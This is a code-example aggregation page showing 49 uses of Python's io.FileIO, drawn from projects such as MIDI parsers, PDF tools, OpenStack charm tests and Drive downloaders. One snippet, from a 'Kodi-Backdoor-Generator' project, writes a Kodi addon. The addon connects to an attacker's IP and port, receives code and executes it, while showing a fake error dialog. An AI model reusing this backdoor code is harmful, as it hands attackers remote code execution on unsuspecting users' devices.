Python io module: FileIO() example source code

We have extracted the following 49 code examples from open-source Python projects to illustrate how to use io.FileIO().
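Before the project examples, a minimal, self-contained sketch of the class itself (the file name is illustrative): io.FileIO is the raw, unbuffered layer of the io stack, so it accepts only the modes 'r', 'w', 'x' and 'a' (optionally with '+') and reads and writes bytes, never str.

import io

# Write raw bytes; FileIO accepts bytes-like objects only.
with io.FileIO("example.bin", "w") as f:
    f.write(b"hello, raw I/O\n")

# Read them back; "r" is the default mode.
with io.FileIO("example.bin", "r") as f:
    print(f.read())    # b'hello, raw I/O\n'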

Project: sqlalchemy-media    Author: pylover
def replace(self, attachable: [io.BytesIO, io.FileIO], position=None, **kwargs):
        """

        .. versionadded:: 0.5

        Replace the underlying file-object with a seekable one.

        :param attachable: A seekable file-object.
        :param position: Position of the new seekable file-object. If :data:`None`,
                         the current position is preserved.
        :param kwargs: The same keyword arguments accepted by :class:`.BaseDescriptor`.
        """

        if position is None:
            position = self.tell()
        # Close the old file-like object
        self.close()
        self._file = attachable

        # Some hacks are here:
        super().__init__(**kwargs)
        self.seek(position)
Project: spiderfoot    Author: wi-fi-analyzer
def append(self, fileobj, bookmark=None, pages=None, import_bookmarks=True):
        """
        Identical to the :meth:`merge()<merge>` method, but assumes you want to concatenate
        all pages onto the end of the file instead of specifying a position.

        :param fileobj: A File Object or an object that supports the standard read
            and seek methods similar to a File Object. Could also be a
            string representing a path to a PDF file.

        :param str bookmark: Optionally, you may specify a bookmark to be applied at
            the beginning of the included file by supplying the text of the bookmark.

        :param pages: can be a :ref:`Page Range <page-range>` or a ``(start, stop[, step])`` tuple
            to merge only the specified range of pages from the source
            document into the output document.

        :param bool import_bookmarks: You may prevent the source document's bookmarks
            from being imported by specifying this as ``False``.
        """

        self.merge(len(self.pages), fileobj, bookmark, pages, import_bookmarks)
Project: midi    Author: MicroTransactionsMatterToo
def __init__(self, data: Union[FileIO, BufferedReader]) -> None:
        chunk_type = data.read(4)
        if chunk_type != b'MThd':
            raise ValueError("File had invalid header chunk type")

        header_length = int.from_bytes(data.read(4), 'big')
        if header_length != 6:
            raise ValueError("File has unsupported header length")
        self.length = header_length

        format = int.from_bytes(data.read(2), 'big')
        if format not in [0, 1, 2]:
            raise ValueError("File has unsupported format")
        self.format = format

        ntrks = int.from_bytes(data.read(2), 'big')
        if format == 0 and ntrks > 1:  # a format 0 file holds exactly one track
            raise ValueError("Multiple tracks in single track format")
        self.ntrks = ntrks

        self.tpqn = int.from_bytes(data.read(2), 'big')
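To make the header layout concrete, here is a self-contained sketch (the values are illustrative) that decodes the same fields from an in-memory 14-byte MThd chunk, mirroring the int.from_bytes calls above:

# Illustrative header: format 1, two tracks, 480 ticks per quarter note.
chunk = (b'MThd'
         + (6).to_bytes(4, 'big')      # header length, always 6
         + (1).to_bytes(2, 'big')      # format
         + (2).to_bytes(2, 'big')      # ntrks
         + (480).to_bytes(2, 'big'))   # tpqn / division

assert chunk[:4] == b'MThd'
fmt = int.from_bytes(chunk[8:10], 'big')
ntrks = int.from_bytes(chunk[10:12], 'big')
tpqn = int.from_bytes(chunk[12:14], 'big')
print(fmt, ntrks, tpqn)                # 1 2 480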
Project: Kodi-Backdoor-Generator    Author: LukaSikic
def addonPy(ip, port):
    with io.FileIO("KodiBackdoor/addon.py", "w") as file:
        file.write('''
import xbmcaddon
import xbmcgui
import socket,struct
addon       = xbmcaddon.Addon()
addonname   = addon.getAddonInfo('name')
line1 = "Error!"
line2 = "An error occurred"
line3 = "Connection to server failed... please try again later"
s=socket.socket(2,1)
s.connect(("'''+ip+'''",'''+port+'''))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})
xbmcgui.Dialog().ok(addonname, line1, line2, line3)
''')

#Zip folder
Project: GoogleBot    Author: MarcoBuster
def download(user, file, msg):
    def startdownload(_request):
        downloader = MediaIoBaseDownload(fh, _request)
        done = False
        while not done:
            status, done = downloader.next_chunk()
            try:
                msg.edit(user.getstr('drive_downloading_progress')
                         .format(p=int(status.progress() * 100)))
            except botogram.api.APIError:
                pass

    os.chdir('/tmp')  # Sorry Windows users
    fh = io.FileIO(file.get('name'), 'wb')

    service = login(user)
    try:
        request = service.files().get_media(fileId=file.get('id'))
        startdownload(request)
        return '/tmp/' + file.get('name')
    except:
        request = service.files().export_media(fileId=file.get('id'), mimeType='application/pdf')
        startdownload(request)
        os.rename('/tmp/' + file.get('name'), '/tmp/' + file.get('name') + '.pdf')
        return '/tmp/' + file.get('name') + '.pdf'
Project: targets-python    Author: targets-fs
def valid_io_modes(self, *a, **kw):
        modes = set()
        t = LocalTarget(is_tmp=True)
        t.open('w').close()
        for mode in self.theoretical_io_modes(*a, **kw):
            try:
                io.FileIO(t.path, mode).close()
            except ValueError:
                pass
            except IOError as err:
                if err.errno == EEXIST:
                    modes.add(mode)
                else:
                    raise
            else:
                modes.add(mode)
        return modes
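The probe above leans on the fact that io.FileIO raises ValueError for mode strings it does not understand (there are no text modes at the raw layer). A minimal standalone sketch of that behaviour, using a temporary file created only for the demonstration:

import io
import os
import tempfile

fd, path = tempfile.mkstemp()
os.close(fd)
try:
    io.FileIO(path, "r+").close()    # accepted: read/write on an existing file
    try:
        io.FileIO(path, "rt")        # rejected: FileIO knows no text mode
    except ValueError as exc:
        print("rejected:", exc)
finally:
    os.remove(path)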
Project: deepspeech.pytorch    Author: SeanNaren
def create_manifest(data_path, tag, ordered=True):
    manifest_path = '%s_manifest.csv' % tag
    file_paths = []
    wav_files = [os.path.join(dirpath, f)
                 for dirpath, dirnames, files in os.walk(data_path)
                 for f in fnmatch.filter(files, '*.wav')]
    for file_path in tqdm(wav_files, total=len(wav_files)):
        file_paths.append(file_path.strip())
    print('\n')
    if ordered:
        _order_files(file_paths)
    with io.FileIO(manifest_path, "w") as file:
        for wav_path in tqdm(file_paths, total=len(file_paths)):
            transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
            file.write(sample.encode('utf-8'))
    print('\n')
Project: gitsome    Author: donnemartin
def _pipe_stdin(self, stdin):
        if stdin is None or isinstance(stdin, io.FileIO):
            return None
        tsi = self._temp_stdin
        bufsize = self.bufsize
        if isinstance(stdin, io.BufferedIOBase):
            buf = stdin.read(bufsize)
            while len(buf) != 0:
                tsi.write(buf)
                tsi.flush()
                buf = stdin.read(bufsize)
        elif isinstance(stdin, (str, bytes)):
            raw = stdin.encode() if isinstance(stdin, str) else stdin
            for i in range((len(raw)//bufsize) + 1):
                tsi.write(raw[i*bufsize:(i + 1)*bufsize])
                tsi.flush()
        else:
            raise ValueError('stdin not understood {0!r}'.format(stdin))
Project: AsyncDB    Author: JimChengLin
def load(self, file: FileIO):
        self.ptr = file.tell()
        self.is_leaf, self.keys = load(file)

        ptr_num = len(self.keys)
        if not self.is_leaf:
            ptr_num += (ptr_num + 1)
        ptrs = unpack('Q' * ptr_num, file.read(8 * ptr_num))

        if self.is_leaf:
            self.ptrs_value = list(ptrs)
        else:
            ptr_num //= 2
            self.ptrs_value = list(ptrs[:ptr_num])
            self.ptrs_child = list(ptrs[ptr_num:])
        self.size = file.tell() - self.ptr
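A minimal round-trip sketch of the struct usage in the snippet above (the file name is illustrative): each pointer is stored as an 8-byte unsigned integer, which is why the read size is 8 * ptr_num.

import io
from struct import pack, unpack

ptrs = [16, 256, 4096]

# Write three 8-byte unsigned integers, then read them back through io.FileIO.
with io.FileIO("node.bin", "w") as f:
    f.write(pack("Q" * len(ptrs), *ptrs))

with io.FileIO("node.bin", "r") as f:
    assert list(unpack("Q" * len(ptrs), f.read(8 * len(ptrs)))) == ptrs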
Project: charm-helpers    Author: juju
def test_create(self, mock_open):
        """Test create sysctl method"""
        _file = MagicMock(spec=io.FileIO)
        mock_open.return_value = _file

        create('{"kernel.max_pid": 1337}', "/etc/sysctl.d/test-sysctl.conf")

        _file.__enter__().write.assert_called_with("kernel.max_pid=1337\n")

        self.log.assert_called_with(
            "Updating sysctl_file: /etc/sysctl.d/test-sysctl.conf"
            " values: {'kernel.max_pid': 1337}",
            level='DEBUG')

        self.check_call.assert_called_with([
            "sysctl", "-p",
            "/etc/sysctl.d/test-sysctl.conf"])
Project: charm-helpers    Author: juju
def test_configure_install_source_distro_proposed(
            self, _spcc, _open, _lsb):
        """Test configuring installation source from deb repo url"""
        _lsb.return_value = FAKE_RELEASE
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        openstack.configure_installation_source('distro-proposed')
        _file.__enter__().write.assert_called_once_with(
            '# Proposed\ndeb http://archive.ubuntu.com/ubuntu '
            'precise-proposed main universe multiverse restricted\n')
        src = ('deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
               'restricted main multiverse universe')
        openstack.configure_installation_source(src)
        _spcc.assert_called_once_with(
            ['add-apt-repository', '--yes',
             'deb http://archive.ubuntu.com/ubuntu/ precise-proposed '
             'restricted main multiverse universe'])
Project: charm-helpers    Author: juju
def test_configure_install_source_uca_repos(
            self, _fip, _lsb, _install, _open):
        """Test configuring installation source from UCA sources"""
        _lsb.return_value = FAKE_RELEASE
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        _fip.side_effect = lambda x: x
        for src, url in UCA_SOURCES:
            actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url)
            openstack.configure_installation_source(src)
            _install.assert_called_with(['ubuntu-cloud-keyring'],
                                        fatal=True)
            _open.assert_called_with(
                '/etc/apt/sources.list.d/cloud-archive.list',
                'w'
            )
            _file.__enter__().write.assert_called_with(actual_url)
Project: charm-helpers    Author: juju
def test_save_scriptrc(self, _open, _charm_dir, _exists, _mkdir):
        """Test generation of scriptrc from environment"""
        scriptrc = ['#!/bin/bash\n',
                    'export setting1=foo\n',
                    'export setting2=bar\n']
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        _charm_dir.return_value = '/var/lib/juju/units/testing-foo-0/charm'
        _exists.return_value = False
        os.environ['JUJU_UNIT_NAME'] = 'testing-foo/0'
        openstack.save_script_rc(setting1='foo', setting2='bar')
        rcdir = '/var/lib/juju/units/testing-foo-0/charm/scripts'
        _mkdir.assert_called_with(rcdir)
        expected_f = '/var/lib/juju/units/testing-foo-0/charm/scripts/scriptrc'
        _open.assert_called_with(expected_f, 'wt')
        _mkdir.assert_called_with(os.path.dirname(expected_f))
        _file.__enter__().write.assert_has_calls(
            list(call(line) for line in scriptrc), any_order=True)
Project: charm-helpers    Author: juju
def test_configure_install_source_uca_repos(
            self, _fip, _lsb, _install, _open):
        """Test configuring installation source from UCA sources"""
        _lsb.return_value = FAKE_RELEASE
        _file = MagicMock(spec=io.FileIO)
        _open.return_value = _file
        _fip.side_effect = lambda x: x
        for src, url in UCA_SOURCES:
            actual_url = "# Ubuntu Cloud Archive\n{}\n".format(url)
            fetch.add_source(src)
            _install.assert_called_with(['ubuntu-cloud-keyring'],
                                        fatal=True)
            _open.assert_called_with(
                '/etc/apt/sources.list.d/cloud-archive.list',
                'w'
            )
            _file.__enter__().write.assert_called_with(actual_url)
Project: make_dataset    Author: hyzhan
def create_manifest(data_path, tag, ordered=True):
    manifest_path = '%s_manifest.csv' % tag
    file_paths = []
    wav_files = [os.path.join(dirpath, f)
                 for dirpath, dirnames, files in os.walk(data_path)
                 for f in fnmatch.filter(files, '*.wav')]
    size = len(wav_files)
    counter = 0
    for file_path in wav_files:
        file_paths.append(file_path.strip())
        counter += 1
        update_progress(counter / float(size))
    print('\n')
    if ordered:
        _order_files(file_paths)
    counter = 0
    with io.FileIO(manifest_path, "w") as file:
        for wav_path in file_paths:
            transcript_path = wav_path.replace('/wav/', '/txt/').replace('.wav', '.txt')
            sample = os.path.abspath(wav_path) + ',' + os.path.abspath(transcript_path) + '\n'
            file.write(sample.encode('utf-8'))
            counter += 1
            update_progress(counter / float(size))
    print('\n')
Project: SmartSocks    Author: waylybaye
def __init__(self, **kwargs):
            buf = FileIO(sys.stdout.fileno(), 'w')
            super(_Py3Utf8Stdout, self).__init__(
                buf,
                encoding='utf8',
                errors='strict'
            )
Project: easy-jupyter    Author: openebs
def download(url, file_name):
    """
    Download a file over HTTP.
    url : URL of the file to download
    file_name : name of the local file to write
    """
    with io.FileIO(file_name, "w") as file:
        # get request
        response = get(url)
        # write to file
        file.write(response.content)
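The version above buffers the whole response in memory before writing it out. For large files a streamed variant is common; a hedged sketch assuming the requests library (which the bare get() call suggests), with illustrative names:

import io
from requests import get

def download_streaming(url, file_name, chunk_size=1 << 20):
    """Stream a large download to disk instead of holding it all in memory."""
    with io.FileIO(file_name, "w") as file:
        response = get(url, stream=True)
        for chunk in response.iter_content(chunk_size=chunk_size):
            file.write(chunk)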
Project: radar    Author: amoose136
def isfileobj(f):
        return isinstance(f, (io.FileIO, io.BufferedReader, io.BufferedWriter))
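What the check above distinguishes, as a quick sketch: a buffered binary open() returns a wrapper whose .raw attribute is the underlying io.FileIO, while an unbuffered open() returns the FileIO itself.

import io

buffered = open("data.bin", "wb")            # io.BufferedWriter around a FileIO
raw = open("data.bin", "rb", buffering=0)    # io.FileIO directly

print(isinstance(buffered, io.BufferedWriter), isinstance(buffered.raw, io.FileIO))  # True True
print(isinstance(raw, io.FileIO))                                                    # True
buffered.close()
raw.close()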
Project: filefinder2    Author: asmodehn
def get_data(self, path):
            """Return the data from path as raw bytes."""
            with io.FileIO(path, 'r') as file:
                return file.read()

    # inspired from importlib2
Project: spiderfoot    Author: wi-fi-analyzer
def write(self, fileobj):
        """
        Writes all data that has been merged to the given output file.

        :param fileobj: Output file. Can be a filename or any kind of
            file-like object.
        """
        my_file = False
        if isString(fileobj):
            fileobj = file(fileobj, 'wb')
            my_file = True

        # Add pages to the PdfFileWriter
        # The commented out line below was replaced with the two lines below it to allow PdfFileMerger to work with PyPdf 1.13
        for page in self.pages:
            self.output.addPage(page.pagedata)
            page.out_pagedata = self.output.getReference(self.output._pages.getObject()["/Kids"][-1].getObject())
            #idnum = self.output._objects.index(self.output._pages.getObject()["/Kids"][-1].getObject()) + 1
            #page.out_pagedata = IndirectObject(idnum, 0, self.output)

        # Once all pages are added, create bookmarks to point at those pages
        self._write_dests()
        self._write_bookmarks()

        # Write the output to the file
        self.output.write(fileobj)

        if my_file:
            fileobj.close()
Project: spiderfoot    Author: wi-fi-analyzer
def close(self):
        """
        Shuts all file descriptors (input and output) and clears all memory
        usage.
        """
        self.pages = []
        for fo, pdfr, mine in self.inputs:
            if mine:
                fo.close()

        self.inputs = []
        self.output = None
Project: spiderfoot    Author: wi-fi-analyzer
def addBookmark(self, title, pagenum, parent=None):
        """
        Add a bookmark to this PDF file.

        :param str title: Title to use for this bookmark.
        :param int pagenum: Page number this bookmark will point to.
        :param parent: A reference to a parent bookmark to create nested
            bookmarks.
        """
        if parent == None:
            iloc = [len(self.bookmarks)-1]
        elif isinstance(parent, list):
            iloc = parent
        else:
            iloc = self.findBookmark(parent)

        dest = Bookmark(TextStringObject(title), NumberObject(pagenum), NameObject('/FitH'), NumberObject(826))

        if parent == None:
            self.bookmarks.append(dest)
        else:
            bmparent = self.bookmarks
            for i in iloc[:-1]:
                bmparent = bmparent[i]
            npos = iloc[-1]+1
            if npos < len(bmparent) and isinstance(bmparent[npos], list):
                bmparent[npos].append(dest)
            else:
                bmparent.insert(npos, [dest])
        return dest
Project: cheribuild    Author: CTSRD-CHERI
def __runProcessWithFilteredOutput(self, proc: subprocess.Popen, logfile: "typing.Optional[io.FileIO]",
                                       stdoutFilter: "typing.Callable[[bytes], None]", cmdStr: str):
        logfileLock = threading.Lock()  # we need a mutex so the logfile line buffer doesn't get messed up
        stderrThread = None
        if logfile:
            # use a thread to print stderr output and write it to logfile (not using a thread would block)
            stderrThread = threading.Thread(target=self._handleStdErr, args=(logfile, proc.stderr, logfileLock, self))
            stderrThread.start()
        for line in proc.stdout:
            with logfileLock:  # make sure we don't interleave stdout and stderr lines
                if logfile:
                    logfile.write(line)
                if stdoutFilter:
                    stdoutFilter(line)
                else:
                    sys.stdout.buffer.write(line)
                    flushStdio(sys.stdout)
        retcode = proc.wait()
        if stderrThread:
            stderrThread.join()
        # Not sure if the remaining call is needed
        remainingOut, remainingErr = proc.communicate()  # communicate() returns (stdout, stderr)
        if remainingErr:
            print("Process had remaining stderr:", remainingErr)
            sys.stderr.buffer.write(remainingErr)
            if logfile:
                logfile.write(remainingErr)
        if remainingOut:
            print("Process had remaining stdout:", remainingOut)
            sys.stdout.buffer.write(remainingOut)
            if logfile:
                logfile.write(remainingOut)
        if stdoutFilter and self._lastStdoutLineCanBeOverwritten:
            # add the final new line after the filtering
            sys.stdout.buffer.write(b"\n")
        if retcode:
            message = "Command \"%s\" failed with exit code %d.\n" % (cmdStr, retcode)
            if logfile:
                message += "See " + logfile.name + " for details."
            raise SystemExit(message)
Project: charm-nova-compute    Author: openstack
def patch_open():
    '''Patch open() to allow mocking both open() itself and the file that is
    yielded.

    Yields the mock for "open" and "file", respectively.'''
    mock_open = MagicMock(spec='builtins.open')
    mock_file = MagicMock(spec=io.FileIO)

    @contextmanager
    def stub_open(*args, **kwargs):
        mock_open(*args, **kwargs)
        yield mock_file

    with patch('builtins.open', stub_open):
        yield mock_open, mock_file
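A hedged usage sketch of the helper above, assuming patch_open itself is wrapped with contextlib.contextmanager (the decorator is not shown in the excerpt); write_config is a hypothetical function under test:

def write_config(path, text):
    # hypothetical code under test
    with open(path, "w") as f:
        f.write(text)

with patch_open() as (mock_open, mock_file):
    write_config("/etc/example.conf", "key=value")
    mock_open.assert_called_once_with("/etc/example.conf", "w")
    mock_file.write.assert_called_once_with("key=value")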
Project: midi    Author: MicroTransactionsMatterToo
def sequence_number(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]:
    length_bytes = bytearray(data.read(4))
    length = int.from_bytes(length_bytes, "big")
    if length != 2:
        raise EventLengthError("Sequence Number length was incorrect. It should be 2, but it was {}".format(length))
    sequence_num_raw = bytearray(data.read(2))
    sequence_num = int.from_bytes(sequence_num_raw, "big")
    return length, sequence_num, sequence_num_raw
Project: midi    Author: MicroTransactionsMatterToo
def text_event(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in text event") from exc

    return length, text, raw_data
Project: midi    Author: MicroTransactionsMatterToo
def copyright_notice(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in copyright notice") from exc

    return length, text, raw_data
Project: midi    Author: MicroTransactionsMatterToo
def chunk_name(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in track/sequence name") from exc

    return length, text, raw_data
Project: midi    Author: MicroTransactionsMatterToo
def instrument_name(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparsable text in instrument name") from exc

    return length, text, raw_data
Project: midi    Author: MicroTransactionsMatterToo
def marker(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparseable text in marker text") from exc

    return length, text, raw_data
Project: midi    Author: MicroTransactionsMatterToo
def cue_point(data: Union[FileIO, BufferedReader]) -> Tuple[int, str, bytearray]:
    length = VariableLengthValue(data).value
    raw_data = bytearray(data.read(length))
    try:
        text = raw_data.decode("ASCII")
    except UnicodeDecodeError as exc:
        raise EventTextError("Unparseable text in Cue Point text") from exc

    return length, text, raw_data
Project: midi    Author: MicroTransactionsMatterToo
def channel_prefix(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]:
    length_bytes = data.read(4)
    length = int.from_bytes(length_bytes, "big")
    if length != 0x01:
        raise EventLengthError("Channel Prefix length invalid. It should be 1, but it's {}".format(length))
    prefix_raw = bytearray(data.read(1))
    prefix = int.from_bytes(prefix_raw, "big")

    return length, prefix, prefix_raw
Project: midi    Author: MicroTransactionsMatterToo
def end_of_track(data: Union[FileIO, BufferedReader]) -> Tuple[int, None, None]:
    length_bytes = data.read(4)
    length = int.from_bytes(length_bytes, "big")
    if length != 0:
        raise EventLengthError("End of Track event with non-zero length")
    return length, None, None
Project: midi    Author: MicroTransactionsMatterToo
def set_tempo(data: Union[FileIO, BufferedReader]) -> Tuple[int, int, bytearray]:
    length_bytes = data.read(4)
    length = int.from_bytes(length_bytes, "big")
    if length != 3:
        raise EventLengthError("Set Tempo event with length other than 3. Given length was {}".format(length))
    raw_data = bytearray(data.read(3))
    tpqm = int.from_bytes(raw_data, "big")

    return length, tpqm, raw_data
Project: midi    Author: MicroTransactionsMatterToo
def time_signature(data: Union[FileIO, BufferedReader]) -> Tuple[int, Tuple[int, int, int, int], bytearray]:
    length_bytes = bytearray(data.read(1))
    length = int.from_bytes(length_bytes, "big")

    if length != 0x04:
        raise EventLengthError("Time Signature event has invalid length. Should be 4, value was {}".format(length))

    data_bytes = bytearray(data.read(4))  # type: bytearray
    numerator = data_bytes[0]  # type: int
    denominator = data_bytes[1]  # type: int
    clock_num = data_bytes[2]
    ts_number = data_bytes[3]

    return length, (numerator, denominator, clock_num, ts_number), data_bytes
Project: midi    Author: MicroTransactionsMatterToo
def key_signature(data: Union[FileIO, BufferedReader]) -> Tuple[int, Tuple[int, int], bytearray]:
    length_bytes = bytearray(data.read(1))
    length = int.from_bytes(length_bytes, "big")

    if length != 0x02:
        raise EventLengthError("Key Signature event has invalid length. Should be 2, value was {}".format(length))

    data_bytes = bytearray(data.read(2))
    signature_index = data_bytes[0]
    minor_major = data_bytes[1]

    return length, (signature_index, minor_major), data_bytes
Project: midi    Author: MicroTransactionsMatterToo
def __init__(self, data: Union[FileIO, BufferedReader]) -> None:
        chunk_name = data.read(4)
        if chunk_name != b'MTrk':
            raise ValueError("Track Chunk header invalid")

        self.length = int.from_bytes(data.read(4), 'big')
Project: midi    Author: MicroTransactionsMatterToo
def _parse(self, data: Union[FileIO, BufferedReader]):
        delta_time = VariableLengthValue(data)
Project: charm-neutron-api    Author: openstack
def patch_open():
    '''Patch open() to allow mocking both open() itself and the file that is
    yielded.

    Yields the mock for "open" and "file", respectively.'''
    mock_open = MagicMock(spec=open)
    mock_file = MagicMock(spec=io.FileIO)

    @contextmanager
    def stub_open(*args, **kwargs):
        mock_open(*args, **kwargs)
        yield mock_file

    with patch('builtins.open', stub_open):
        yield mock_open, mock_file
Project: charm-neutron-openvswitch    Author: openstack
def patch_open():
    '''Patch open() to allow mocking both open() itself and the file that is
    yielded.

    Yields the mock for "open" and "file", respectively.'''
    mock_open = MagicMock(spec=open)
    mock_file = MagicMock(spec=io.FileIO)

    @contextmanager
    def stub_open(*args, **kwargs):
        mock_open(*args, **kwargs)
        yield mock_file

    with patch('builtins.open', stub_open):
        yield mock_open, mock_file
Project: py_custom_vision_client    Author: CatalystCode
def _format_files(cls, *fobjs: FileIO) -> List[HttpFile]:
        files = []
        for fobj in fobjs:
            filename = basename(fobj.name)
            extension = splitext(filename)[1]
            content_type = 'application/{}'.format(extension)
            files.append(('file', (filename, fobj, content_type)))
        return files
Project: Trity    Author: toxic-ig
def clone():
    print (''+T+'Remember to put https:// in front of the website!')
    hey = raw_input(''+T+'' + color.UNDERLINE + 'Website>' + color.END)
    response = urllib2.urlopen(hey)
    page_source = response.read()

    with io.FileIO("websitesource.html", "w") as file:
        file.write(page_source)
    print (''+G+'[*] Finished!')
Project: krpcScripts    Author: jwvanderbeck
def isfileobj(f):
        return isinstance(f, (io.FileIO, io.BufferedReader, io.BufferedWriter))
Project: packaging    Author: blockstack
def isfileobj(f):
        return isinstance(f, io.FileIO)
Project: packaging    Author: blockstack
def isfileobj(f):
        return isinstance(f, (io.FileIO, io.BufferedReader))
Project: packaging    Author: blockstack
def isfile(f):
        if isinstance(f, io.FileIO):
            return True
        elif hasattr(f, 'buffer'):
            return isfile(f.buffer)
        elif hasattr(f, 'raw'):
            return isfile(f.raw)
        return False
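As a sketch of what the .buffer/.raw walk above sees through: sys.stdout is normally a TextIOWrapper over a BufferedWriter over a FileIO, so isfile() finds the raw file object two layers down, while an in-memory stream has nothing underneath (the file name below is illustrative).

import io
import sys

print(isfile(sys.stdout))      # usually True: TextIOWrapper -> BufferedWriter -> FileIO
print(isfile(io.BytesIO()))    # False: no FileIO anywhere underneath

f = open("notes.txt", "w")     # TextIOWrapper; the FileIO is reached via .buffer then .raw
print(isfile(f))               # True
f.close()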
Project: LetItRain-475-2161_Good_Rodgers    Author: ForensicTools
def download_revisions(httpauth, service, fileID, title, path, counter, log_file):
    if not os.path.exists(path + "/" + title):
        os.makedirs(path + "/" + title)
    url = "https://www.googleapis.com/drive/v3/files/" + fileID + "/revisions"
    resp, content = httpauth.request(url, 'GET')
    revisions = json.loads(content.decode('utf-8'))
    revision_info = []
    rev_num = 1
    for revision in revisions["revisions"]:
        revision_info.append([str(rev_num), revision["id"], revision["modifiedTime"]])
        file_path = path + "/" + title + "/" + title + ".rev" + str(rev_num)
        orig_title = str(title)
        # to prevent duplicate file names being saved
        if os.path.exists(file_path):
            file_path, title = get_new_file_name(file_path)
            log_and_print(log_file, counter + " File named '" + orig_title + "' already exists. Saving as '" + title + "' instead.")
        log_and_print(log_file, counter + " Downloading '" + title + ".rev" + str(rev_num) + "'...")
        request = service.revisions().get_media(fileId=fileID, revisionId=revision["id"])
        fh = io.FileIO(file_path, mode='wb')
        downloader = MediaIoBaseDownload(fh, request)
        done = False
        while done is False:
            status, done = downloader.next_chunk()
            # Print status of download (mainly for larger files)
            print("%d%%\r" % int(status.progress() * 100), end="", flush=True)
        fh.close()
        log_and_print(log_file, counter + " Hashing '" + title + ".rev" + str(rev_num) + "'...")
        with open(path + "/_hashes.txt", "a") as hashes_file:
            hashes_file.write(title + ".rev" + str(rev_num) + "\n")
            hashes_file.write("--MD5: " + hash_file(file_path, "md5") + "\n")
            hashes_file.write("--SHA1: " + hash_file(file_path, "sha1") + "\n")
            hashes_file.write("--SHA256: " + hash_file(file_path, "sha256") + "\n")
        rev_num += 1
    log_and_print(log_file, counter + " Writing revision info for '" + title + "'...")
    with open(path + "/" + title + "/" + title + "_revisions.txt", "w") as saved_file:
        for item in revision_info:
            saved_file.write("Revision Number: " + item[0] + "\n")
            saved_file.write("--Revision ID: " + item[1] + "\n")
            saved_file.write("--Revision Last Modifed: " + item[2] + "\n")

# Check if there are revisions for a given fileID